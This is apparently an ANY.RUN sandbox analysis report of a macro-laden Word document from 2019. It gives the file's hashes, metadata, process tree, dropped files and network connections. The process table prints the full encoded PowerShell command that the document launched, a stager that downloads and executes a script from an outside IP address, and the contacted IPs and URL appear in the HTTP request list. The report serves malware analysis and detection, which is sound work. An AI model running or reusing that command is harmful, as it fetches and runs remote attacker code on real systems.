analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

06cd72ab4b97789007042d056f87d6f2.doc

Full analysis: https://app.any.run/tasks/8c4f4e13-c3e0-484c-9107-9814bcd10079
Verdict: Malicious activity
Analysis date: February 19, 2019, 07:39:01
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: fqegalywyk bjaxuv, Subject: zzyrax fbux, Author: Dorothy Jones, Template: Normal, Last Saved By: Windows User, Revision Number: 5, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Thu Apr 19 19:59:00 2018, Last Saved Time/Date: Fri Feb 15 00:25:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 2, Security: 0
MD5:

06CD72AB4B97789007042D056F87D6F2

SHA1:

F849FB86889ECD3EEA93112A219A7CBF6FE128B8

SHA256:

17AF821C262A61B46FCB14F6A61928DBEC8723DE0AEDEAF643B2350FD8B3092E

SSDEEP:

1536:rb3HAZ7R8fZ00YrEkk1yWKLGxC6fo12qHOh/:/3HAlpwkr7LMm2qH

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2836)
    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 2836)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3860)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2836)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2836)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
  • Название
  • 1
TitleOfParts:
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 14
CharCountWithSpaces: 2
Paragraphs: 1
Lines: 1
Bytes: 22528
Company: -
CodePage: Unicode (UTF-8)
Security: None
Characters: 2
Words: -
Pages: 1
ModifyDate: 2019:02:15 00:25:00
CreateDate: 2018:04:19 18:59:00
TotalEditTime: 1.0 minutes
Software: Microsoft Office Word
RevisionNumber: 5
LastModifiedBy: Windows User
Template: Normal
Comments: -
Keywords: -
Author: Dorothy Jones
Subject: zzyrax fbux
Title: fqegalywyk bjaxuv
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
32
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2836"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\06cd72ab4b97789007042d056f87d6f2.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3860powershell -Exec Bypass -NoP -NoExit -EC SQBFAFgAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADYAMwAuADEANwAyAC4AMQA1ADIALgAyADMAMwAvAGkAcwBhAHAAaQAvAEEARwBvAHQAbAB4AE8AUwBGADEAOABaAGcAbQBBAEwASgB4AEEAQQAwAGUAbQBvAGgAOABMADIARQBiAEcAMQBzAFcASgB3AGsATwBKADQAQwBUAEcARgA0AGsATgBTAFoATQBXAEMAdgBBAC0ARAA5AHMAZwBmAFEAagBxAFEAZwAzAEMAagBnAGMAQgBWAGUAbgBzAGsALwBDAHMAdgBEAE4AWgBSAHcAcwBpAG4AZwBkAHoAcABtAEgASwBOAC8AOQBlADUAdgBJAHEAWgBoAHIASgA3AGoASABzAGgAdABZAHEAOABPAFkAVgA0ADIASAB2AHcAQQA3ADgAbABKAHcAMgB3ADAAaQB2AE0AZwBGAEEATwBpAHMASQB3AEQANwA0AGcASwBEAGkAVQA0AHkAWgAvAEMASQBlAFYAWgBLAE0AaQAwAHIAdQAvAGwAagBPAG0ANQBkAE0ATABzAHEAcwBnAEoAaQAzAGYATgBzAG0ARABtAEQAMQBEAEIARQA3AFQAOQAzAGsAVgBnAGIASgBCAGEAZwBPAEsAYgBYAE0AcABBAEUAdAB4ADQALwBjAFEAaQA0AFkAMwBHAHYAUgBYADYAZwBuAFUAYwBhAEoASQBDAC0AWQB6ADgAUwBCAHoAZgB3AG4AMABzAHkAYQBZAGsAZgBUAG0AMgA0ADIAcQBFAEIAOABxAGsARgBNAGwAbAB5AFQAcQBGAG8AVgBnAHkAdwBfAF8AIgApACkAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 261
Read events
869
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2836WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR90FB.tmp.cvr
MD5:
SHA256:
3860powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9ZI58DEABTP8MCKE1QUB.temp
MD5:
SHA256:
2836WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:32B1C4E7517012FB32BB1E80577B362C
SHA256:7114B9DABF63CC741025E24D1FB321B980BC7F86AEC6447C64DF48E86174627B
3860powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3860powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF199e3a.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2836WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$cd72ab4b97789007042d056f87d6f2.docpgc
MD5:C994D8C4314418A160CC7F864F16CBDB
SHA256:16BCEEF93ED14DF49A7FFBB0DA171B70A36E6CA068682E7E9B7355FF731C0907
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3860
powershell.exe
GET
193.187.172.181:80
http://193.187.172.181/test.dat
unknown
unknown
3860
powershell.exe
GET
200
163.172.152.233:80
http://163.172.152.233/isapi/AGotlxOSF18ZgmALJxAA0emoh8L2EbG1sWJwkOJ4CTGF4kNSZMWCvA-D9sgfQjqQg3CjgcBVensk/CsvDNZRwsingdzpmHKN/9e5vIqZhrJ7jHshtYq8OYV42HvwA78lJw2w0ivMgFAOisIwD74gKDiU4yZ/CIeVZKMi0ru/ljOm5dMLsqsgJi3fNsmDmD1DBE7T93kVgbJBagOKbXMpAEtx4/cQi4Y3GvRX6gnUcaJIC-Yz8SBzfwn0syaYkfTm242qEB8qkFMllyTqFoVgyw__
FR
text
149 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3860
powershell.exe
193.187.172.181:80
unknown
3860
powershell.exe
163.172.152.233:80
Online S.a.s.
FR
unknown

DNS requests

No data

Threats

No threats detected
No debug info